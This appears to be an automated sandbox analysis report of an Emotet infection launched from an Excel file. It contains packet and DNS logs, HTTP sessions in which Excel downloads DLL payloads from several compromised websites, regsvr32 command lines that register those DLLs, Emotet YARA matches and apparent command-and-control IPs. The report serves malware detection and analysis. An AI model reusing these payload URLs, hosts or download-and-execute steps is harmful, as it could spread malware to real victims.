                              May 23, 2022 09:11:05.202843904 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.202846050 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.202866077 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.202883005 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.202892065 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.202924967 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.203325033 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.203336000 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.204063892 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.237323046 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.237354040 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.237373114 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.237391949 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.237407923 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.237421036 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.237425089 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.237441063 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.237442970 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.237443924 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.237452984 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.237461090 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.237469912 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.237478018 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.237488031 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.237494946 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.237500906 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.237513065 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.237520933 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.237535000 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.237546921 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.237564087 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.237567902 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.237581015 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.237581968 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.237597942 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.237600088 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.237616062 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.237632990 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.237658024 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.237689972 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.237822056 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.237862110 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.237862110 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.237879992 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.237896919 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.237910986 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.237946987 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.237953901 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.237981081 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.237997055 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.238013983 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.238024950 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.238032103 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.238039017 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.238049030 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.238058090 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.238086939 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.238265038 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.238327026 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.238344908 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.238362074 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.238368034 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.238384008 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.238387108 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.238396883 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.238415003 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.238570929 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.238596916 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.238617897 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.238631964 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.238651037 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.238667965 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.238684893 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.238688946 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.238702059 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.238703966 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.238718033 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.238729000 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.238735914 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.238737106 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.238755941 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.238773108 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.238997936 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.239038944 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.239039898 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.239073992 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.239073992 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.239105940 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.239115953 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.239123106 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.239136934 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.239140034 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.239190102 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.239193916 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.239208937 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.239224911 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.239236116 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:34.200769901 CEST491818080192.168.2.22165.22.73.229
                              May 23, 2022 09:11:34.242854118 CEST808049181165.22.73.229192.168.2.22
                              May 23, 2022 09:11:34.253952026 CEST808049181165.22.73.229192.168.2.22
                              May 23, 2022 09:11:34.253982067 CEST808049181165.22.73.229192.168.2.22
                              May 23, 2022 09:11:34.254185915 CEST491818080192.168.2.22165.22.73.229
                              May 23, 2022 09:11:34.261413097 CEST491818080192.168.2.22165.22.73.229
                              May 23, 2022 09:11:34.305515051 CEST808049181165.22.73.229192.168.2.22
                              May 23, 2022 09:11:34.305617094 CEST491818080192.168.2.22165.22.73.229
                              May 23, 2022 09:11:34.944618940 CEST491818080192.168.2.22165.22.73.229
                              May 23, 2022 09:11:35.029506922 CEST808049181165.22.73.229192.168.2.22
                              May 23, 2022 09:11:35.194545031 CEST808049181165.22.73.229192.168.2.22
                              May 23, 2022 09:11:35.194590092 CEST808049181165.22.73.229192.168.2.22
                              May 23, 2022 09:11:35.194817066 CEST491818080192.168.2.22165.22.73.229
                              May 23, 2022 09:11:38.196368933 CEST808049181165.22.73.229192.168.2.22
                              May 23, 2022 09:11:38.196434021 CEST808049181165.22.73.229192.168.2.22
                              May 23, 2022 09:11:38.196619987 CEST491818080192.168.2.22165.22.73.229
                              May 23, 2022 09:12:53.079247952 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:12:53.079525948 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:12:53.079770088 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:12:53.079993010 CEST4917380192.168.2.22103.171.181.223
                              May 23, 2022 09:12:53.375053883 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:12:53.376171112 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:12:53.406249046 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:12:53.593436003 CEST4917380192.168.2.22103.171.181.223
                              May 23, 2022 09:12:53.983469963 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:12:53.983525991 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:12:54.137310982 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:12:54.498347044 CEST4917380192.168.2.22103.171.181.223
                              May 23, 2022 09:12:55.184776068 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:12:55.184926987 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:12:55.481450081 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:12:56.230165958 CEST4917380192.168.2.22103.171.181.223
                              May 23, 2022 09:12:57.602967978 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:12:57.603423119 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:12:58.117925882 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:12:59.678014994 CEST4917380192.168.2.22103.171.181.223
                              May 23, 2022 09:13:02.408247948 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:13:02.408641100 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:13:03.406755924 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:13:06.558228970 CEST4917380192.168.2.22103.171.181.223
                              May 23, 2022 09:13:12.018697977 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:13:12.022205114 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:13:13.236799002 CEST491778080192.168.2.22165.22.73.229
                              May 23, 2022 09:13:13.236874104 CEST491778080192.168.2.22165.22.73.229
                              May 23, 2022 09:13:13.968890905 CEST4917580192.168.2.2266.71.247.68
                              TimestampSource PortDest PortSource IPDest IP
                              May 23, 2022 09:10:53.219748974 CEST5586853192.168.2.228.8.8.8
                              May 23, 2022 09:10:53.591710091 CEST53558688.8.8.8192.168.2.22
                              May 23, 2022 09:10:57.178133965 CEST4968853192.168.2.228.8.8.8
                              May 23, 2022 09:10:57.197616100 CEST53496888.8.8.8192.168.2.22
                              May 23, 2022 09:11:00.364746094 CEST5883653192.168.2.228.8.8.8
                              May 23, 2022 09:11:01.418008089 CEST5883653192.168.2.228.8.8.8
                              May 23, 2022 09:11:01.437613010 CEST53588368.8.8.8192.168.2.22
                              May 23, 2022 09:11:04.926969051 CEST5013453192.168.2.228.8.8.8
                              May 23, 2022 09:11:05.052700996 CEST53501348.8.8.8192.168.2.22
                              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                              May 23, 2022 09:10:53.219748974 CEST | 192.168.2.22 | 8.8.8.8 | 0x2ee2 | Standard query (0) | learnviaonline.com | A (IP address) | IN (0x0001)
                              May 23, 2022 09:10:57.178133965 CEST | 192.168.2.22 | 8.8.8.8 | 0x2ee2 | Standard query (0) | kolejleri.com | A (IP address) | IN (0x0001)
                              May 23, 2022 09:11:00.364746094 CEST | 192.168.2.22 | 8.8.8.8 | 0xe372 | Standard query (0) | stainedglassexpress.com | A (IP address) | IN (0x0001)
                              May 23, 2022 09:11:01.418008089 CEST | 192.168.2.22 | 8.8.8.8 | 0xe372 | Standard query (0) | stainedglassexpress.com | A (IP address) | IN (0x0001)
                              May 23, 2022 09:11:04.926969051 CEST | 192.168.2.22 | 8.8.8.8 | 0x6607 | Standard query (0) | milanstaffing.com | A (IP address) | IN (0x0001)
                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                              May 23, 2022 09:10:53.591710091 CEST | 8.8.8.8 | 192.168.2.22 | 0x2ee2 | No error (0) | learnviaonline.com | | 103.171.181.223 | A (IP address) | IN (0x0001)
                              May 23, 2022 09:10:57.197616100 CEST | 8.8.8.8 | 192.168.2.22 | 0x2ee2 | No error (0) | kolejleri.com | | 85.114.142.153 | A (IP address) | IN (0x0001)
                              May 23, 2022 09:11:01.437613010 CEST | 8.8.8.8 | 192.168.2.22 | 0xe372 | No error (0) | stainedglassexpress.com | | 66.71.247.68 | A (IP address) | IN (0x0001)
                              May 23, 2022 09:11:05.052700996 CEST | 8.8.8.8 | 192.168.2.22 | 0x6607 | No error (0) | milanstaffing.com | | 107.189.3.39 | A (IP address) | IN (0x0001)
                              May 23, 2022 09:11:24.828629971 CEST | 8.8.8.8 | 192.168.2.22 | 0xd862 | No error (0) | windowsupdatebg.s.llnwi.net | | 95.140.230.192 | A (IP address) | IN (0x0001)
                              May 23, 2022 09:11:24.828629971 CEST | 8.8.8.8 | 192.168.2.22 | 0xd862 | No error (0) | windowsupdatebg.s.llnwi.net | | 95.140.230.128 | A (IP address) | IN (0x0001)
                              • learnviaonline.com
                              • kolejleri.com
                              • stainedglassexpress.com
                              • milanstaffing.com
                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              0 | 192.168.2.22 | 49173 | 103.171.181.223 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              Timestamp | kBytes transferred | Direction | Data
                              May 23, 2022 09:10:53.772973061 CEST | 2 | OUT | GET /wp-admin/qGb/ HTTP/1.1
                              Accept: */*
                              UA-CPU: AMD64
                              Accept-Encoding: gzip, deflate
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                              Host: learnviaonline.com
                              Connection: Keep-Alive
                              May 23, 2022 09:10:53.993267059 CEST | 3 | IN | HTTP/1.1 200 OK
                              Date: Mon, 23 May 2022 07:10:53 GMT
                              Server: Apache
                              Cache-Control: no-cache, must-revalidate
                              Pragma: no-cache
                              Expires: Mon, 23 May 2022 07:10:53 GMT
                              Content-Disposition: attachment; filename="Jf8.dll"
                              Content-Transfer-Encoding: binary
                              Set-Cookie: 628b337ddc562=1653289853; expires=Mon, 23-May-2022 07:11:53 GMT; Max-Age=60; path=/
                              Last-Modified: Mon, 23 May 2022 07:10:53 GMT
                              Content-Length: 371200
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: application/x-msdownload


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              1 | 192.168.2.22 | 49174 | 85.114.142.153 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              Timestamp | kBytes transferred | Direction | Data
                              May 23, 2022 09:10:57.229271889 CEST | 393 | OUT | GET /wp-admin/REvup/ HTTP/1.1
                              Accept: */*
                              UA-CPU: AMD64
                              Accept-Encoding: gzip, deflate
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                              Host: kolejleri.com
                              Connection: Keep-Alive
                              May 23, 2022 09:10:57.325115919 CEST | 395 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Mon, 23 May 2022 07:10:57 GMT
                              Content-Type: application/x-msdownload
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/7.4.29
                              Cache-Control: no-cache, must-revalidate
                              Pragma: no-cache
                              Expires: Mon, 23 May 2022 07:10:57 GMT
                              Content-Disposition: attachment; filename="4HWP0KQI.dll"
                              Content-Transfer-Encoding: binary
                              Set-Cookie: 628b338146fc9=1653289857; expires=Mon, 23-May-2022 07:11:57 GMT; Max-Age=60; path=/
                              Last-Modified: Mon, 23 May 2022 07:10:57 GMT
                              Vary: Accept-Encoding,User-Agent
                              Content-Encoding: gzip


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              2 | 192.168.2.22 | 49175 | 66.71.247.68 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              Timestamp | kBytes transferred | Direction | Data
                              May 23, 2022 09:11:01.574974060 CEST | 647 | OUT | GET /classes/05SkiiW9y4DDGvb6/ HTTP/1.1
                              Accept: */*
                              UA-CPU: AMD64
                              Accept-Encoding: gzip, deflate
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                              Host: stainedglassexpress.com
                              Connection: Keep-Alive
                              May 23, 2022 09:11:01.798887968 CEST | 648 | IN | HTTP/1.1 200 OK
                              Date: Mon, 23 May 2022 07:11:01 GMT
                              Server: Apache
                              X-Powered-By: PHP/7.3.33
                              Cache-Control: no-cache, must-revalidate
                              Pragma: no-cache
                              Expires: Mon, 23 May 2022 07:11:01 GMT
                              Content-Disposition: attachment; filename="1Cb5zOjLgWGDemz55C5.dll"
                              Content-Transfer-Encoding: binary
                              Set-Cookie: 628b3385b2519=1653289861; expires=Mon, 23-May-2022 07:12:01 GMT; Max-Age=60; path=/
                              Last-Modified: Mon, 23 May 2022 07:11:01 GMT
                              Content-Length: 371200
                              X-Content-Type-Options: nosniff
                              Vary: User-Agent
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: application/x-msdownload


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              3 | 192.168.2.22 | 49176 | 107.189.3.39 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              Timestamp | kBytes transferred | Direction | Data
                              May 23, 2022 09:11:05.086694002 CEST | 1040 | OUT | GET /images/D4TRnDubF/ HTTP/1.1
                              Accept: */*
                              UA-CPU: AMD64
                              Accept-Encoding: gzip, deflate
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                              Host: milanstaffing.com
                              Connection: Keep-Alive
                              May 23, 2022 09:11:05.140671968 CEST | 1042 | IN | HTTP/1.1 200 OK
                              Connection: Keep-Alive
                              Keep-Alive: timeout=5, max=100
                              x-powered-by: PHP/7.0.33
                              set-cookie: 628b33891c2fb=1653289865; expires=Mon, 23-May-2022 07:12:05 GMT; Max-Age=60; path=/
                              cache-control: no-cache, must-revalidate
                              pragma: no-cache
                              last-modified: Mon, 23 May 2022 07:11:05 GMT
                              expires: Mon, 23 May 2022 07:11:05 GMT
                              content-type: application/x-msdownload
                              content-disposition: attachment; filename="T35PENELLOsp.dll"
                              content-transfer-encoding: binary
                              content-length: 371200
                              date: Mon, 23 May 2022 07:11:05 GMT
                              server: LiteSpeed
                              vary: User-Agent


                              Target ID:0
                              Start time:09:10:16
                              Start date:23/05/2022
                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                              Imagebase:0x13ffa0000
                              File size:28253536 bytes
                              MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Target ID:3
                              Start time:09:10:26
                              Start date:23/05/2022
                              Path:C:\Windows\System32\regsvr32.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocx
                              Imagebase:0xff5b0000
                              File size:19456 bytes
                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.926422500.0000000000300000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:high

                              Target ID:4
                              Start time:09:10:28
                              Start date:23/05/2022
                              Path:C:\Windows\System32\regsvr32.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\KuSAkvGE\rWFJGQNl.dll"
                              Imagebase:0xff5b0000
                              File size:19456 bytes
                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.1218942103.00000000001D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.1219771205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:high

                              Target ID:5
                              Start time:09:10:29
                              Start date:23/05/2022
                              Path:C:\Windows\System32\regsvr32.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocx
                              Imagebase:0xff5b0000
                              File size:19456 bytes
                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.935437838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.935123835.00000000003E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:high

                              Target ID:6
                              Start time:09:10:29
                              Start date:23/05/2022
                              Path:C:\Windows\System32\svchost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                              Imagebase:0xff7d0000
                              File size:27136 bytes
                              MD5 hash:C78655BC80301D76ED4FEF1C1EA40A7D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate

                              Target ID:7
                              Start time:09:10:31
                              Start date:23/05/2022
                              Path:C:\Windows\System32\regsvr32.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\Ejpzh\qlDqXeGagKnBKzd.dll"
                              Imagebase:0xff5b0000
                              File size:19456 bytes
                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1218923490.00000000002C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1219645231.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:high

                              Target ID:8
                              Start time:09:10:34
                              Start date:23/05/2022
                              Path:C:\Windows\System32\regsvr32.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocx
                              Imagebase:0xff5b0000
                              File size:19456 bytes
                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.944087304.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.943168453.00000000002D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:high

                              Target ID:9
                              Start time:09:10:36
                              Start date:23/05/2022
                              Path:C:\Windows\System32\regsvr32.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\FiPeSYwmr\Wuiko.dll"
                              Imagebase:0xff5b0000
                              File size:19456 bytes
                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.1218912030.0000000000150000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.1219706572.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security

                              Target ID:10
                              Start time:09:10:36
                              Start date:23/05/2022
                              Path:C:\Windows\System32\regsvr32.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocx
                              Imagebase:0xff5b0000
                              File size:19456 bytes
                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.950850615.00000000002C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.951348566.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security

                              Target ID:11
                              Start time:09:10:39
                              Start date:23/05/2022
                              Path:C:\Windows\System32\regsvr32.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\PLVmoWLosZJQb\bTjwWDTWvnC.dll"
                              Imagebase:0xff5b0000
                              File size:19456 bytes
                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.1219777301.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.1218930467.0000000000220000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security


                                Execution Graph

                                Execution Coverage:7.2%
                                Dynamic/Decrypted Code Coverage:2.3%
                                Signature Coverage:10.3%
                                Total number of Nodes:1849
                                Total number of Limit Nodes:30
7fef9d39410 __doserrno 16919->16921 16923 7fef9d2bd70 _invalid_parameter 17 API calls 16921->16923 16923->16914 16924 7fef9d394a6 __doserrno 16940 7fef9d3fbc0 LeaveCriticalSection 16924->16940 16927 7fef9d3fb25 16926->16927 16928 7fef9d3fb7a 16926->16928 16931 7fef9d3fb56 16927->16931 16932 7fef9d3fb3b InitializeCriticalSectionAndSpinCount 16927->16932 16929 7fef9d39464 16928->16929 16930 7fef9d3fb81 EnterCriticalSection 16928->16930 16929->16924 16934 7fef9d39520 16929->16934 16930->16929 16941 7fef9d29360 LeaveCriticalSection 16931->16941 16932->16931 16942 7fef9d3f900 16934->16942 16936 7fef9d39545 16937 7fef9d3959d SetFilePointer 16936->16937 16939 7fef9d39552 _dosmaperr 16936->16939 16938 7fef9d395c1 GetLastError 16937->16938 16937->16939 16938->16939 16939->16924 16940->16914 16941->16928 16943 7fef9d3f935 16942->16943 16945 7fef9d3f913 __doserrno 16942->16945 16944 7fef9d3f99e __doserrno 16943->16944 16947 7fef9d3f9e9 __doserrno 16943->16947 16946 7fef9d2bd70 _invalid_parameter 17 API calls 16944->16946 16945->16936 16946->16945 16947->16945 16948 7fef9d2bd70 _invalid_parameter 17 API calls 16947->16948 16948->16945 16949 7fef9d41200 16952 7fef9d2ed30 16949->16952 16951 7fef9d41212 _IsExceptionObjectToBeDestroyed __SehTransFilter 16953 7fef9d2ed3e 16952->16953 16955 